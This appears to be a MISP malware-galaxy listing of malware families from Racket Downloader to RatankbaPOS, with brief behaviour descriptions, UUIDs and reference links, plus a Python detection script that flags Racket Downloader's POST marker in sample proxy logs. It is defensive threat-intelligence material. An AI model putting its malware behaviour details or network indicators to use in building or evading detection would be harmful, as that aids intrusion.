- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://news.sophos.com/en-us/2021/08/03/trash-panda-as-a-service-raccoon-stealer-steals-cookies-cryptocoins-and-more/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Racket Downloader
Racket Downloader is an HTTP(S) downloader.
It uses a custom substitution cipher to decrypt its strings, and RC5 with a 256-bit key to encrypt and decrypt its network traffic.
It sends an HTTP POST request containing a particular value that inspired its name, like "?product_field=racket" or "prd_fld=racket".
Racket Downloader was deployed against South Korean targets running the Initech INISAFE CrossWeb EX software in Q2 2021 and Q1 2022.
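The network indicator above (a POST whose query string or form body carries product_field=racket or prd_fld=racket) lends itself to a simple proxy-log check. The following is an added example, not code from Malpedia or from any of the cited reports: the log format (method, URL, body, space-separated) and the log lines themselves are constructed for illustration, and the parameter names are taken from the description above.

```python
from urllib.parse import parse_qs, urlsplit

# Indicator keys/value taken from the Racket Downloader description:
# "?product_field=racket" or "prd_fld=racket" in an HTTP POST.
RACKET_KEYS = {"product_field", "prd_fld"}
RACKET_VALUE = "racket"

# Constructed proxy log (not real traffic). Each line: METHOD URL BODY,
# with "-" standing for an empty body. Addresses are RFC 5737 test ranges.
SAMPLE_LOG = """\
POST http://203.0.113.10/index.php?product_field=racket -
GET http://203.0.113.10/favicon.ico -
POST http://198.51.100.7/upload.php prd_fld=racket&id=1
POST http://192.0.2.5/api/v1/login user=bob&pass=x
POST http://203.0.113.10/index.php?product_field=tennis -
"""


def carries_racket_marker(url: str, body: str) -> bool:
    """True if the URL query string or the POST body has one of the
    known keys set to "racket". Both locations are checked because the
    marker has been reported in the query string as well as the body."""
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if body and body != "-":
        for key, values in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(values)
    return any(RACKET_VALUE in params.get(key, []) for key in RACKET_KEYS)


def find_racket_requests(log_text: str) -> list[str]:
    """Return the URLs of POST requests carrying the marker, in log order."""
    hits = []
    for line in log_text.splitlines():
        parts = line.split(" ", 2)
        if len(parts) < 3:
            continue  # malformed line; skip rather than guess
        method, url, body = parts
        if method == "POST" and carries_racket_marker(url, body):
            hits.append(url)
    return hits


if __name__ == "__main__":
    for url in find_racket_requests(SAMPLE_LOG):
        print("racket marker:", url)
```

The check matches on an exact key/value pair rather than a substring, so an unrelated product_field=tennis request is not flagged; in production the same logic would be applied to decrypted (TLS-terminated) proxy data, since the downloader speaks HTTP(S).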
Internal MISP references
UUID 993db92e-0c84-4750-a58f-2b61d6cd6d67
which can be used as unique global reference for Racket Downloader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.racket - webarchive
- https://securelist.com/the-lazarus-group-deathnote-campaign/109490/ - webarchive
- https://asec.ahnlab.com/ko/40495/ - webarchive
- https://medium.com/s2wlab/analysis-of-lazarus-malware-abusing-non-activex-module-in-south-korea-7d52b9539c12 - webarchive
- https://asec.ahnlab.com/en/33801/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rad
Internal MISP references
UUID f99e0c8b-a479-4902-9c7e-e16724323ef6
which can be used as unique global reference for Rad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Radamant
Internal MISP references
UUID 98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c
which can be used as unique global reference for Radamant
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RadRAT
Internal MISP references
UUID 271752e3-67ca-48bc-ade2-30eec11defca
which can be used as unique global reference for RadRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RagnarLocker (Windows)
Internal MISP references
UUID 33f55172-873b-409e-a09b-97ac1301b036
which can be used as unique global reference for RagnarLocker (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarlocker - webarchive
- https://www.bleepingcomputer.com/news/security/capcom-hit-by-ragnar-locker-ransomware-1tb-allegedly-stolen/ - webarchive
- https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://blog.reversing.xyz/docs/posts/unpacking_ragnarlocker_via_emulation/ - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://seguranca-informatica.pt/ragnar-locker-malware-analysis/ - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom - webarchive
- https://www.ic3.gov/Media/News/2022/220307.pdf - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://www.capcom.co.jp/ir/english/news/pdf/e210413.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://securelist.com/targeted-ransomware-encrypting-data/99255/ - webarchive
- https://www.acronis.com/en-sg/articles/ragnar-locker/ - webarchive
- https://www.theregister.com/2022/03/09/fbi_says_ragnar_locker_ransomware/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://id-ransomware.blogspot.com/2020/02/ragnarlocker-ransomware.html - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ragnarlocker-ransomware-threatens-to-release-confidential-information - webarchive
- https://www.bleepingcomputer.com/news/security/japanese-game-dev-capcom-hit-by-cyberattack-business-impacted/ - webarchive
- https://twitter.com/AltShiftPrtScn/status/1403707430765273095 - webarchive
- https://securelist.com/modern-ransomware-groups-ttps/106824/ - webarchive
- https://blog.cyble.com/2022/01/20/deep-dive-into-ragnar-locker-ransomware-gang/ - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://www.waterisac.org/system/files/articles/FLASH-MU-000140-MW.pdf - webarchive
- https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1 - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ - webarchive
- http://reversing.fun/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html - webarchive
- http://reversing.fun/posts/2021/04/15/unpacking_ragnarlocker_via_emulation.html - webarchive
- https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/ - webarchive
- https://www.bleepingcomputer.com/news/security/fbi-ransomware-gang-breached-52-us-critical-infrastructure-orgs/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/analysis-and-protections-for-ragnarlocker-ransomware.html - webarchive
- https://blog.reversing.xyz/reversing/2021/04/15/unpacking_ragnarlocker_via_emulation.html - webarchive
- https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/ - webarchive
- https://krebsonsecurity.com/2020/11/ransomware-group-turns-to-facebook-ads/ - webarchive
- https://www.zdnet.com/article/capcom-quietly-discloses-cyberattack-impacting-email-file-servers/ - webarchive
- https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://techcrunch.com/2023/10/20/ragnarlocker-ransomware-dark-web-portal-seized-in-international-sting/?guccounter=1 - webarchive
- https://intel471.com/blog/conti-ransomware-cooperation-maze-lockbit-ragnar-locker - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://blog.blazeinfosec.com/dissecting-ragnar-locker-the-case-of-edp/ - webarchive
- https://cyware.com/news/ragnar-locker-breached-52-organizations-and-counting-fbi-warns-0588d220/ - webarchive
- https://www.bleepingcomputer.com/news/security/ragnarlocker-ransomware-hits-edp-energy-giant-asks-for-10m/ - webarchive
- https://news.sophos.com/en-us/2021/02/03/mtr-casebook-uncovering-a-backdoor-implant-in-a-solarwinds-orion-server/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ragnarok
According to Bleeping Computer, the ransomware is used in targeted attacks against unpatched Citrix servers. It excludes Russian and Chinese targets by filtering on the system's Language ID. It also tries to disable Windows Defender and contains a number of UNIX file path references in its strings. Files are encrypted with AES using a dynamically generated key, which is then wrapped with RSA.
Internal MISP references
UUID ce9dffb7-2220-4e9c-9cb1-221195ba42ba
which can be used as unique global reference for Ragnarok
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-targets-citrix-adc-disables-windows-defender/ - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://news.sophos.com/en-us/2020/05/21/asnarok2/ - webarchive
- https://www.tarlogic.com/blog/ragnarok-malware-stopper-vaccine/ - webarchive
- https://www.bleepingcomputer.com/news/security/ragnarok-ransomware-releases-master-decryptor-after-shutdown/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-01-26-ragnarok-cfg-vk.notes.raw - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Raindrop
Raindrop is a loader for Cobalt Strike that was observed in the SolarWinds attack.
Internal MISP references
UUID 309f9be7-8824-4452-90b3-cef81fd10099
which can be used as unique global reference for Raindrop
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.raindrop - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware - webarchive
- https://www.sans.org/webcasts/contrarian-view-solarwinds-119515 - webarchive
- https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html - webarchive
- https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf - webarchive
- https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf - webarchive
- https://www.youtube.com/watch?v=GfbxHy6xnbA - webarchive
- https://www.mandiant.com/resources/unc2452-merged-into-apt29 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rakhni
Internal MISP references
UUID cf6887d9-3d68-4f89-9d61-e97dcc4d8c20
which can be used as unique global reference for Rakhni
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rambo
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Rambo.
Known Synonyms |
---|
brebsd |
Internal MISP references
UUID 805b99d1-233d-4f7f-b343-440e5d507494
which can be used as unique global reference for Rambo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rambo - webarchive
- https://securitykitten.github.io/2017/02/15/the-rambo-backdoor.html - webarchive
- https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://github.com/malware-kitten/securitykitten.github.io/blob/master/_posts/2017-02-15-the-rambo-backdoor.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ramdo
Internal MISP references
UUID 51f53823-d289-4176-af45-3fca7eda824b
which can be used as unique global reference for Ramdo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ramnit
According to Check Point, Ramnit is primarily a banking trojan, meaning that its purpose is to steal login credentials for online banking, which cybercriminals can sell or use in future attacks. For this reason, Ramnit primarily targets individuals rather than focusing on particular industries.
Nevertheless, Ramnit campaigns have been observed targeting organizations in particular industries; for example, a 2019 campaign targeted financial organizations in the United Kingdom, Italy, and Canada.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ramnit.
Known Synonyms |
---|
Nimnul |
Internal MISP references
UUID 542161c0-47a4-4297-baca-5ed98386d228
which can be used as unique global reference for Ramnit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ramnit - webarchive
- https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/ - webarchive
- https://muha2xmad.github.io/unpacking/ramnit/ - webarchive
- http://www.nao-sec.org/2018/01/analyzing-ramnit-used-in-seamless.html - webarchive
- https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf - webarchive
- http://contagiodump.blogspot.com/2012/01/blackhole-ramnit-samples-and-analysis.html - webarchive
- https://blogs.akamai.com/2019/02/ramnit-in-the-uk.html - webarchive
- https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf - webarchive
- https://informationsecurity.report/Resources/Whitepapers/b201d876-c5df-486d-975e-2dc08eb85f02_W32.Ramnit%20analysis.pdf - webarchive
- https://www.researchgate.net/profile/Lorenzo-De-Carli/publication/320250366_Botnet_protocol_inference_in_the_presence_of_encrypted_traffic/links/5fa9608792851cc286a08592/Botnet-protocol-inference-in-the-presence-of-encrypted-traffic.pdf?origin=publication_detail - webarchive
- https://www.youtube.com/watch?v=l6ZunH6YG0A - webarchive
- https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/ - webarchive
- https://artik.blue/malware4 - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://redcanary.com/resources/webinars/deep-dive-process-injection/ - webarchive
- https://www.youtube.com/watch?v=N4f2e8Mygag - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-fairfax - webarchive
- https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest - webarchive
- https://research.checkpoint.com/ramnits-network-proxy-servers/ - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://malwarebreakdown.com/2017/08/23/the-seamless-campaign-isnt-losing-any-steam/ - webarchive
- https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89 - webarchive
- http://www.vkremez.com/2018/02/deeper-dive-into-ramnit-banker-vnc-ifsb.html - webarchive
- https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf - webarchive
- https://securityintelligence.com/posts/ramnit-banking-trojan-stealing-card-data/ - webarchive
- https://bin.re/blog/the-dga-of-ramnit/ - webarchive
- https://www.mandiant.com/resources/pe-file-infecting-malware-ot - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ramsay
Internal MISP references
UUID 3b5bb37b-c5be-45b6-a4b1-83a03605a926
which can be used as unique global reference for Ramsay
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ramsay - webarchive
- https://www.welivesecurity.com/2020/05/13/ramsay-cyberespionage-toolkit-airgapped-networks/ - webarchive
- https://www.antiy.cn/research/notice&report/research_report/20200522.html - webarchive
- https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html - webarchive
- https://www.sentinelone.com/blog/why-on-device-detection-matters-new-ramsay-trojan-targets-air-gapped-networks/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf - webarchive
- https://www.youtube.com/watch?v=SKIu4LqMrns - webarchive
- https://cocomelonc.github.io/tutorial/2022/05/16/malware-pers-5.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ranbyus
Internal MISP references
UUID 5d9a27e7-3110-470a-ac0d-2bf00cac7846
which can be used as unique global reference for Ranbyus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ranbyus - webarchive
- https://www.welivesecurity.com/2012/06/05/smartcard-vulnerabilities-in-modern-banking-malware/ - webarchive
- https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf - webarchive
- https://www.group-ib.ru/brochures/Group-IB-Corkow-Report-EN.pdf - webarchive
- https://bin.re/blog/the-dga-of-ranbyus/ - webarchive
- https://www.johannesbader.ch/2015/05/the-dga-of-ranbyus/ - webarchive
- https://www.welivesecurity.com/2012/12/19/win32spy-ranbyus-modifying-java-code-in-rbs/ - webarchive
- http://www.xylibox.com/2013/01/trojanwin32spyranbyus.html - webarchive
- https://bin.re/blog/ranbyuss-dga-revisited/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ranion
Ransomware.
Internal MISP references
UUID 2ae8b99c-cebe-4758-8ae9-8f336a7bef0d
which can be used as unique global reference for Ranion
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ranscam
Internal MISP references
UUID 50c92b0b-cae3-41e7-b7d8-dffc2c88ac4b
which can be used as unique global reference for Ranscam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ransoc
Internal MISP references
UUID 5310903e-0704-4ca4-ab1b-52d243dddb06
which can be used as unique global reference for Ransoc
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RansomEXX (Windows)
RansomExx is a ransomware family that targeted multiple companies starting in mid-2020. It shares commonalities with Defray777.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RansomEXX (Windows).
Known Synonyms |
---|
Defray777 |
Ransom X |
Internal MISP references
UUID ddb31693-2356-4345-9c0f-ab37724090a4
which can be used as unique global reference for RansomEXX (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomexx - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-ransomexx-ransomware - webarchive
- https://id-ransomware.blogspot.com/2020/06/ransomexx-ransomware.html - webarchive
- https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ecuadors-state-run-cnt-telco-hit-by-ransomexx-ransomware/ - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://www.trendmicro.com/en_us/research/21/a/expanding-range-and-improving-speed-a-ransomexx-approach.html - webarchive
- https://www.sentinelone.com/anthology/ransomexx/ - webarchive
- https://www.bleepingcomputer.com/news/security/brazils-court-system-under-massive-ransomexx-ransomware-attack/ - webarchive
- https://medium.com/proferosec-osm/ransomexx-fixing-corrupted-ransom-8e379bcaf701 - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/ - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/5/ - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-attack-hits-italys-lazio-region-affects-covid-19-site/ - webarchive
- https://securelist.com/ransomexx-trojan-attacks-linux-systems/99279/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.youtube.com/watch?v=qxPXxWMI2i4 - webarchive
- https://github.com/Bleeping/Ransom.exx - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3 - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html - webarchive
- https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/4 - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-ransom-x-ransomware-used-in-texas-txdot-cyberattack/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RansomHub
Ransomware written in Golang and obfuscated with Gobfuscate, with significant code overlap to Knight ransomware.
Internal MISP references
UUID 5cd36ca4-ddf9-4abf-a7e4-b54a5d02c62a
which can be used as unique global reference for RansomHub
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ransomlock
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ransomlock.
Known Synonyms |
---|
WinLock |
Internal MISP references
UUID 3e47c926-eea3-4fba-915a-1f3c5b92a94c
which can be used as unique global reference for Ransomlock
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
SNC
SNC is ransomware that encrypts files and demands a variable amount of Bitcoin before releasing the decryption key. The threat actor asks victims to make contact to negotiate the ransom fee.
Internal MISP references
UUID 0e9c2936-7167-48fb-9dee-a83f83d8e41e
which can be used as unique global reference for SNC
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rapid Ransom
InfinityGroup notes that Rapid Ransomware, unlike most ransomware, stays active on the computer after the initial encryption run and also encrypts any new files that are created. It does this by creating auto-run entries that launch the ransomware and display the ransom note every time the infected system is started.
Internal MISP references
UUID 06929ad3-2a00-4212-b171-9ecb5f956af5
which can be used as unique global reference for Rapid Ransom
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.rapid_ransom - webarchive
- https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do - webarchive
- https://exchange.xforce.ibmcloud.com/collection/GuessWho-Ransomware-A-Variant-of-Rapid-Ransomware-ef226b9792fa4c1e34fa4c587db04145 - webarchive
- https://www.youtube.com/watch?v=LUxOcpIRxmg - webarchive
- https://twitter.com/malwrhunterteam/status/977275481765613569 - webarchive
- https://twitter.com/malwrhunterteam/status/997748495888076800 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RapidStealer
A spy trojan is a type of malware that has the capability to gather information from the infected system without consent from the user. This information is then sent to a remote attacker.
Internal MISP references
UUID bc1fc21d-80c0-4629-bb18-d5ae1df2a431
which can be used as unique global reference for RapidStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Rarog
Internal MISP references
UUID 184e5134-473c-4a01-9a8b-f4776f178fc9
which can be used as unique global reference for Rarog
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
rarstar
This ransomware encrypts all of the user's data on the PC (photos, documents, Excel tables, music, videos, etc.), adds its specific extension to every file, and creates a HOW_TO_DECYPHER_FILES.txt file in every folder that contains encrypted files.
Internal MISP references
UUID e0a1407f-2595-4bd2-ba16-2c6d9be4e066
which can be used as unique global reference for rarstar
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Raspberry Robin
Worm spread by external drives that leverages Windows Installer to reach out to QNAP-associated domains and download a malicious DLL.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Raspberry Robin.
Known Synonyms |
---|
LINK_MSIEXEC |
QNAP-Worm |
RaspberryRobin |
Internal MISP references
UUID 34b3a45b-e522-4342-91c8-b6aad9817f99
which can be used as unique global reference for Raspberry Robin
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.raspberry_robin - webarchive
- https://darktrace.com/blog/the-early-bird-catches-the-worm-darktraces-hunt-for-raspberry-robin - webarchive
- https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/ - webarchive
- https://www.huntress.com/blog/evolution-of-usb-borne-malware-raspberry-robin - webarchive
- https://www.securityjoes.com/post/raspberry-robin-detected-itw-targeting-insurance-financial-institutes-in-europe - webarchive
- https://www.trendmicro.com/fr_fr/research/22/l/raspberry-robin-malware-targets-telecom-governments.html - webarchive
- https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/ - webarchive
- https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/ - webarchive
- https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/ - webarchive
- https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks - webarchive
- https://unit42.paloaltonetworks.com/unsigned-dlls/ - webarchive
- https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis - webarchive
- https://research.checkpoint.com/2023/raspberry-robin-anti-evasion-how-to-exploit-analysis/ - webarchive
- https://www.bleepingcomputer.com/news/security/microsoft-links-raspberry-robin-worm-to-clop-ransomware-attacks/ - webarchive
- https://harfanglab.io/en/insidethelab/raspberry-robin-and-its-new-anti-emulation-trick/ - webarchive
- https://www.cybereason.com/blog/threat-alert-raspberry-robin-worm-abuses-windows-installer-and-qnap-devices - webarchive
- https://redcanary.com/blog/raspberry-robin/ - webarchive
- https://thehackernews.com/2022/07/microsoft-links-raspberry-robin-usb.html?_m=3n%2e009a%2e2800%2ejp0ao0cjb8%2e1shm - webarchive
- https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
- http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ratankba
This is a backdoor that establishes persistence using the Startup folder. It communicates to its C&C server using HTTPS and a static HTTP User-Agent string. QUICKRIDE is capable of gathering information about the system, downloading and loading executables, and uninstalling itself. It was leveraged against banks in Poland.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ratankba.
Known Synonyms |
---|
QUICKRIDE |
Internal MISP references
UUID eead20f5-6a30-4700-8d14-cfb2d42eaff0
which can be used as unique global reference for Ratankba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ratankba - webarchive
- http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html - webarchive
- https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/ - webarchive
- https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf - webarchive
- https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html - webarchive
- https://raw.githubusercontent.com/eric-erki/APT_CyberCriminal_Campagin_Collections/master/2017/2017.05.30.Lazarus_Arisen/Group-IB_Lazarus.pdf - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://twitter.com/PhysicalDrive0/status/828915536268492800 - webarchive
- https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware - webarchive
- https://community.broadcom.com/symantecenterprise/viewdocument/attackers-target-dozens-of-global-b - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-gladstone - webarchive
- https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware-0 - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
RatankbaPOS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular RatankbaPOS.
Known Synonyms |
---|
RATANKBAPOS |
Internal MISP references
UUID 15b85bac-c58b-41fd-8332-cfac7c445e0d
